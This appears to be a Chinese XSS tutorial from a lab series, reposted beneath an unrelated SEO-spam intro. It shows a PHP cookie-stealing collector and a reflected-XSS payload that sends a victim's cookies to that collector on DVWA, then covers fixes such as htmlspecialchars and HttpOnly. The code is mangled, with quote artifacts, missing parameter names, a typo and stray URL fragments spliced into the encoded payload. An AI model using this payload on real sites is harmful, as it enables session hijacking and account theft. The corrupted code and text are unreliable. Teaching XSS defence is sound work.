各位老铁们好,相信很多人对数据库导入网站源码分享都不是特别的了解,因此呢,今天就来为大家分享下关于数据库导入网站源码分享以及数据库导入数据库的问题知识,还望可以帮助大家,解决大家的一些困惑,下面一起来看看吧!
文章来源:知了汇智冯老师
今天是《web安全-XSS攻击》系列的最后一篇啦,希望大家好好学习哦~
XSS之
知了汇智-禁卫实验室(GoDun.F)
1.编写获取cookie的代码cookie.php,并将其放在一个web服务器上。
内容如下:
<?php
$cookie=$_GET[&39;];
file_put_contents(&39;,$cookie);
?>
2.构造如下URL,并发送给被攻击者:
原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
<script>doument.location=&39;+document.cookie;</script>
需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E39;http://xsser.me&39;http://localhost/XSS&使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
$name=htmlspecialchars($_GET[&39;]);
如下,图一是没有进行html编码的,图2是进行了html编码的。经过html编码后script标签被当成了html实体
我们还可以服务端设置会话Cookie的HTTPOnly属性,这样,客户端的JS脚本就不能获取Cookie信息了
1修复总结
因为XSS漏洞涉及输入和输出两部分,所以其修复也分两种
A:过滤输入的数据,包括”‘”,”“”,”<”,”>”“on*”等非法字符。
B:对输出到页面的数据进行相应的编码转换,包括HTML实体编码、JavaScript编码等。
本次关于XSS攻击的课程就结束啦,谢谢大家关注。
如果你还想了解更多这方面的信息,记得收藏关注本站。
